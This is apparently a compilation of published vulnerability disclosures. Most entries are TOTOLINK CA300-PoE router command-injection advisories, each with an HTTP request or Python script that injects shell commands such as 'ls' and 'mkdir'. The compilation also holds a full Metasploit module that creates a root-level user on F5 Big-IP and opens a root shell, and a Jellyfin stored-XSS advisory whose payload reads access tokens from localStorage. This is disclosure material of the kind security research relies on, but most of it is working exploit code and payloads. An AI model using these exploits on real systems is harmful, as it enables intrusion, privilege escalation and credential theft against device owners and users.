TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the NetDiagPingSize parameter in the setNetworkDiag function.

TOTOLINK Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in setNetworkDiag.

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.254
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 100
    Origin: http://192.168.0.254
    Connection: keep-alive
    Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
    Cookie: SESSION_ID=2:1673492439:2
    
    {"topicurl" :"setting/setNetworkDiag","NetDiagMethod" : "0", "NetDiagPingSize": "100||ls;"}

CVE-2023-24142: CVE-vulns/setNetworkDiag_NetDiagPingSize.md at main · Double-q1015/CVE-vulns

TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the NetDiagPingTimeOut parameter in the setNetworkDiag function.

TOTOLINK Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in setNetworkDiag.

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.254
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 100
    Origin: http://192.168.0.254
    Connection: keep-alive
    Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
    Cookie: SESSION_ID=2:1673492439:2
    
    {"topicurl" :"setting/setNetworkDiag","NetDiagMethod" : "0", "NetDiagPingTimeOut": "4||ls;"}

CVE-2023-24141: CVE-vulns/setNetworkDiag_NetDiagPingTimeOut.md at main · Double-q1015/CVE-vulns

TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the NetDiagHost parameter in the setNetworkDiag function.

**TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the NetDiagHost parameter in the function setNetworkDiag****Description**

TOTOLINK Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in setNetworkDiag.

******Firmware information**

*   Manufacturer's address:https://www.totolink.net/
*   Firmware download address : https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/139/ids/36.html

**Affected version**

**Version: V6.2c.884**

**Vulnerability details**

POC1:

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.254
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 100
    Origin: http://192.168.0.254
    Connection: keep-alive
    Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
    Cookie: SESSION_ID=2:1673492439:2
    
    {"topicurl":"setting/setNetworkDiag","NetDiagMethod":"0","NetDiagHost":"www.baidu.com|expr 50 - 3;"}
    

POC2:

    import requests
    url = "http://192.168.0.254:80/cgi-bin/cstecgi.cgi"
    cookie = {"Cookie":"SESSION_ID=2:1672999258:2"}
    data = {"topicurl" : "setDiagnosisCfg",
    "ip" : "192.168.1.1||mkdir /test1111;"}
    
    data1 = {'topicurl' : "setting/setNetworkDiag","NetDiagMethod" : "0", "NetDiagHost":"www.baidu.com|echo `ls`;"}
    
    response = requests.post(url, cookies=cookie, json=data1)
    print(response.text)
    print(response)
    
    data2 = {"topicurl":"setting/showNetworkDiag"}
    response = requests.post(url, cookies=cookie, json=data2)
    print(response.text)
    print(response)
    
    

The function setNetworkDiag is used to set the corresponding variable

In function showNetworkDiag

step into function getDiagInfo

CVE-2023-24139: CVE-vulns/setNetworkDiag_NetDiagHost.md at main · Double-q1015/CVE-vulns

TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the NetDiagTracertHop parameter in the setNetworkDiag function.

Permalink

Cannot retrieve contributors at this time

**TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the NetDiagTracertHop parameter in the function setNetworkDiag****Description**

TOTOLINK Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in setNetworkDiag.

******Firmware information**

*   Manufacturer's address:https://www.totolink.net/
*   Firmware download address : https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/139/ids/36.html

**Affected version**

**Version: V6.2c.884**

**Vulnerability details**

POC1:

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.254
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 100
    Origin: http://192.168.0.254
    Connection: keep-alive
    Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
    Cookie: SESSION_ID=2:1673492439:2
    
    {"topicurl" :"setting/setNetworkDiag","NetDiagMethod" : "1", "NetDiagTracertHop": "20||ls;"}
    

The function setNetworkDiag is used to set the corresponding variable

In function showNetworkDiag

step into function getDiagInfo，V11 is the value of system.NetDiag.method

CVE-2023-24143: CVE-vulns/setNetworkDiag_NetDiagTracertHop.md at main · Double-q1015/CVE-vulns

TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the plugin_version parameter in the setUnloadUserData function.

Permalink

**TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the plugin\_version parameter in the function setUnloadUserData****Description**

TOTOLINK Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in setUnloadUserData.

******Firmware information**

*   Manufacturer's address:https://www.totolink.net/
*   Firmware download address : https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/139/ids/36.html

**Affected version**

**Version: V6.2c.884**

**Vulnerability details**

POC1:

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.254
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 100
    Origin: http://192.168.0.254
    Connection: keep-alive
    Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
    Cookie: SESSION_ID=2:1673492439:2
    
    {"topicurl" : "setting/setUnloadUserData", "plugin_version": "|mkdir /setUnloadUserData_2222;"}
    

Folder created successfully

CVE-2023-24145: CVE-vulns/setUnloadUserData.md at main · Double-q1015/CVE-vulns

TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the host_time parameter in the NTPSyncWithHost function.

Permalink

**TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the host\_time parameter in the function NTPSyncWithHost****Description**

TOTOLINK Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in NTPSyncWithHost.

******Firmware information**

*   Manufacturer's address:https://www.totolink.net/
*   Firmware download address : https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/139/ids/36.html

**Affected version**

**Version: V6.2c.884**

**Vulnerability details**

POC:

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.254
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 100
    Origin: http://192.168.0.254
    Connection: keep-alive
    Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
    Cookie: SESSION_ID=2:1673492439:2
    
    {"topicurl":"NTPSyncWithHost", "host_time":"2022-01-01 20:12:43';mkdir /test9999;'"}
    

Folder created successfully

CVE-2023-24138: CVE-vulns/NTPSyncWithHost.md at main · Double-q1015/CVE-vulns

TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the NetDiagPingNum parameter in the setNetworkDiag function.

TOTOLINK Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in setNetworkDiag.

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.254
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 100
    Origin: http://192.168.0.254
    Connection: keep-alive
    Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
    Cookie: SESSION_ID=2:1673492439:2
    
    {"topicurl" :"setting/setNetworkDiag","NetDiagMethod" : "0", "NetDiagPingNum": "4||ls;"}

CVE-2023-24140: CVE-vulns/setNetworkDiag_NetDiagPingNum.md at main · Double-q1015/CVE-vulns

TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the minute parameter in the setRebootScheCfg function.

TOTOLINK Router **CA300-PoE V6.2c.884** was found to contain a command injection vulnerability in setRebootScheCfg.

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.254
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 100
    Origin: http://192.168.0.254
    Connection: keep-alive
    Referer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260
    Cookie: SESSION_ID=2:1673492439:2
    
    {"topicurl" :"setting/setRebootScheCfg","mode" : "1", "minute": "';mkdir /minute_1111;'"}
    

    int __fastcall setRebootScheCfg(int a1, int a2, int a3)
    {
      int mode_v; // $s5
      int week_v; // $s3
      const char *hour_v; // $fp
      const char *minute_v; // $s7
      int recHour_v; // $s0
      int v9; // $v0
      int v11; // $v0
      int i; // $s0
      _BYTE *v13; // $v0
      char *v14; // $a0
      int v15; // $s0
      int v16; // $s0
      char v19[256]; // [sp+2Ch] [-244h] BYREF
      char v20[128]; // [sp+12Ch] [-144h] BYREF
      char v21[128]; // [sp+1ACh] [-C4h] BYREF
      int v22[16]; // [sp+22Ch] [-44h] BYREF
    
      memset(v20, 0, sizeof(v20));
      memset(v21, 0, sizeof(v21));
      memset(v19, 0, sizeof(v19));
      mode_v = websGetVar(a2, "mode", "0");
      week_v = websGetVar(a2, "week", "");
      hour_v = (const char *)websGetVar(a2, "hour", "");
      minute_v = (const char *)websGetVar(a2, "minute", "");
      recHour_v = websGetVar(a2, "recHour", "0");
      cs_uci_set("system.reboot.mode", mode_v);
      cs_uci_set("system.reboot.week", week_v);
      cs_uci_set("system.reboot.hour", hour_v);
      cs_uci_set("system.reboot.minute", minute_v);
      cs_uci_set("system.reboot.recHour", recHour_v);
      cs_uci_commit("system");
      strcpy(v19, "sed -i /reboot/d /etc/crontabs/root");
      CsteSystem(v19, 0);
      CsteSystem("killall sche_reboot", 0);
      v9 = atoi(mode_v);
      if ( v9 == 1 )                                // mode=1
      {
        v11 = atoi(week_v);
        if ( v11 == 255 )
        {
          strcpy(v21, "*");
        }
        else if ( v11 )
        {
          for ( i = 1; i != 8; ++i )
          {
            if ( ((atoi(week_v) >> i) & 1) != 0 )
            {
              sprintf(v20, (const char *)&dword_4404, i);
              strcat(v21, v20);
              strcat(v21, &dword_4408);
            }
          }
          v13 = (_BYTE *)strrchr(v21, 44);
          if ( v13 )
            *v13 = 0;
        }
        sprintf(v19, "echo '%s %s * * %s reboot -f'>> /etc/crontabs/root", minute_v, hour_v, v21);
        v14 = v19;
    LABEL_13:
        CsteSystem(v14, 0);
        goto LABEL_3;
      }
      if ( v9 == 2 )
      {
        v15 = atoi(recHour_v);
        if ( v15 > 0 )
        {
          sysinfo(v22);
          v16 = 3600 * v15 - v22[0];
          if ( v16 <= 0 )
          {
            cs_cmd("reboot", 16464, 1);
            goto LABEL_3;
          }
          CsteSystem("killall sche_reboot", 0);
          sprintf(v20, "sche_reboot %ld &", v16);
          v14 = v20;
          goto LABEL_13;
        }
      }
    LABEL_3:
      cs_cmd("/etc/init.d/cron", "restart", 2);
      websSetCfgResponse(a1, a3, "0", "reserv");
      return 0;
    }

CVE-2023-24146: CVE-vulns/setRebootScheCfg_minute.md at main · Double-q1015/CVE-vulns

This Metasploit module creates a local user with a username/password and root-level privileges. Note that a root-level account is not required to do this, which makes it a privilege escalation issue. Note that this is pretty noisy, since it creates a user account and creates log files and such. Additionally, most (if not all) vulnerabilities in F5 grant root access anyways.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'unix_crypt'class MetasploitModule < Msf::Exploit::Local  include Msf::Post::Linux::F5Mcp  include Msf::Exploit::CmdStager  def initialize(info = {})    super(      update_info(        info,        'Name' => 'F5 Big-IP Create Admin User',        'Description' => %q{          This creates a local user with a username/password and root-level          privileges. Note that a root-level account is not required to do this,          which makes it a privilege escalation issue.          Note that this is pretty noisy, since it creates a user account and          creates log files and such. Additionally, most (if not all)          vulnerabilities in F5 grant root access anyways.          Adapted from https://github.com/rbowes-r7/refreshing-mcp-tool/blob/main/mcp-privesc.rb        },        'License' => MSF_LICENSE,        'Author' => ['Ron Bowes'],        'Platform' => [ 'unix', 'linux', 'python' ],        'SessionTypes' => ['shell', 'meterpreter'],        'References' => [          ['URL', 'https://github.com/rbowes-r7/refreshing-mcp-tool'], # Original PoC          ['URL', 'https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/'],          ['URL', 'https://support.f5.com/csp/article/K97843387'],        ],        'Privileged' => true,        'DisclosureDate' => '2022-11-16',        'Arch' => [ ARCH_CMD, ARCH_PYTHON ],        'Type' => :unix_cmd,        'Targets' => [[ 'Auto', {} ]],        'Notes' => {          'Stability' => [],          'Reliability' => [],          'SideEffects' => []        }      )    )    register_options([      OptString.new('USERNAME', [true, 'Username to create (default: random)', Rex::Text.rand_text_alphanumeric(8)]),      OptString.new('PASSWORD', [true, 'Password for the new user (default: random)', Rex::Text.rand_text_alphanumeric(12)]),      OptBool.new('CREATE_SESSION', [true, 'If set, use the new account to create a root session', true]),    ])  end  def exploit    # Get or generate the username/password    fail_with(Failure::BadConfig, 'USERNAME cannot be empty') if datastore['USERNAME'].empty?    username = datastore['USERNAME']    if datastore['CREATE_SESSION']      password = Rex::Text.rand_text_alphanumeric(12)      new_password = datastore['PASSWORD'] || Rex::Text.rand_text_alphanumeric(12)      print_status("Will attempt to create user #{username} / #{password}, then change password to #{new_password} when creating a session")    else      password = datastore['PASSWORD'] || Rex::Text.rand_text_alphanumeric(12)      print_status("Will attempt to create user #{username} / #{password}")    end    # If the password is already hashed, leave it as-is    vprint_status('Hashing the password with SHA512')    hashed_password = UnixCrypt::SHA512.build(password)    if !hashed_password || hashed_password.empty?      fail_with(Failure::BadConfig, 'Failed to hash the password with String.crypt')    end    # These requests have to go in a single 'session', which, to us, is    # a single packet (since we don't have AF_UNIX sockets)    result = mcp_send_recv([      # Authenticate as 'admin' (this probably shouldn't work but does)      mcp_build('user_authenticated', 'structure', [        mcp_build('user_authenticated_name', 'string', 'admin')      ]),      # Start transaction      mcp_build('start_transaction', 'structure', [        mcp_build('start_transaction_load_type', 'ulong', 0)      ]),      # Create the role mapping      mcp_build('create', 'structure', [        mcp_build('user_role_partition', 'structure', [          mcp_build('user_role_partition_user', 'string', username),          mcp_build('user_role_partition_role', 'ulong', 0),          mcp_build('user_role_partition_partition', 'string', '[All]'),        ])      ]),      # Create the userdb entry      mcp_build('create', 'structure', [        mcp_build('userdb_entry', 'structure', [          mcp_build('userdb_entry_name', 'string', username),          mcp_build('userdb_entry_partition_id', 'string', 'Common'),          mcp_build('userdb_entry_is_system', 'ulong', 0),          mcp_build('userdb_entry_shell', 'string', '/bin/bash'),          mcp_build('userdb_entry_is_crypted', 'ulong', 1),          mcp_build('userdb_entry_passwd', 'string', hashed_password),        ])      ]),      # Finish the transaction      mcp_build('end_transaction', 'structure', [])    ])    # Handle errors    if result.nil?      fail_with(Failure::Unknown, 'Request to mcp appeared to fail')    end    # The only result we really care about is an error    error_returned = false    result.each do |r|      result = mcp_get_single(r, 'result')      result_code = mcp_get_single(result, 'result_code')      # If there's no code or it's zero, just ignore it      if result_code.nil? || result_code == 0        next      end      # If we're here, an error was returned!      error_returned = true      # Otherwise, try and get result_message      result_message = mcp_get_single(result, 'result_message')      if result_message.nil?        print_warning("mcp query returned a non-zero result (#{result_code}), but no error message")      else        print_error("mcp query returned an error message: #{result_message} (code: #{result_code})")      end    end    # Let them know if it likely worked    if !error_returned      print_good("Service didn't return an error, so user was likely created!")      if datastore['CREATE_SESSION']        print_status('Attempting create a root session...')        out = cmd_exec("echo -ne \"#{password}\\n#{password}\\n#{new_password}\\n#{new_password}\\n#{payload.encoded}\\n\" | su #{username}")        vprint_status("Output from su command: #{out}")      end    end  endend

F5 Big-IP Create Administrative User

In Jellyfin 10.8.x through 10.8.3, the name of a collection is vulnerable to stored XSS. This allows an attacker to steal access tokens from the localStorage of the victim.

**usd-2022-0031 | Jellyfin 10.8.1 - Cross-Site Scripting**

**Advisory ID:** usd-2022-0031  
**Product:** Jellyfin  
**Affected Version:** 10.8.1  
**Vulnerability Type:** CWE-79  
**Security Risk:** Critical  
**Vendor URL:** https://jellyfin.org  
**Vendor Status:** fixed  
**CVE number:** CVE-2023-23635

**Description**

A stored XSS in Jellyfin 10.8.1 allows an remote attacker to inject JavaScript into the name of a collection to perform a Cross-Site Scripting (XSS) attack.  
Because session tokens are stored in the localStorage, the attacker can extract them via javascript.

**Proof of Concept**

The following screenshot shows how an attacker can create a malicious collection.

  
The injected JavaScript code is executed in the user's browser, if a user (e.g. admin) visits the _collections_ page.

  
If you want to do some more interesting stuff with this vulnerability like taking over the admin account, you can use the following payload to read the access tokens from the localStorage.

"><img src=/X onerror=alert(localStorage.getItem("jellyfin\_credentials"))>

Getting the access token and device id allows you to rebuild the request for the _Quick Connect_ Feature.

This feature allows users to login using a PIN. The following request sets a PIN.

POST /QuickConnect/Authorize?Code=111111 HTTP/1.1  
Host: localhost:8096  
User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:102.0) Gecko/20100101 Firefox/102.0  
Accept: \*/\*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-Emby-Authorization: MediaBrowser Client="Jellyfin Web", Device="Firefox", DeviceId="TW96aWxsYS81LjAgKFgxMTsgTGludXggeDg2XzY0OyBydjoxMDAuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC8xMDAuMHwxNjU2NzU0NTEwMjcz", Version="10.8.1", Token="7bd97aae0924484884d7d13a74e9517c"  
Origin: \[http://localhost:8096\]()  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
Connection: close  
Cookie: sfcsrftoken=S82egH1Csl8FsxnMPQ6NGzXCWL3tiI8tNUvfsNyXnAVoGGthaUjsjrWesdhvu9Gc  
Content-Length: 0

**Fix**

It is recommended to treat all input on the website as potentially dangerous.  
Hence, all output that is dynamically generated based on user-controlled data should be encoded according to its context.  
The majority of programming languages support standard procedures for encoding meta characters.

**References**

*   https://owasp.org/www-community/attacks/xss/
*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23635 

**Timeline**

*   **2022-07-18**: First contact request via security@jellyfin.org
*   **2022-08-02**: Vulnerability details submitted
*   **2022-08-16**: Fixed by Vendor
*   **2023-01-16:** Requested CVE assigned
*   **2023-01-19**: The advisory is published

**Credits**

This security vulnerability was found by Christian Pöschl of usd AG.

Tag

#linux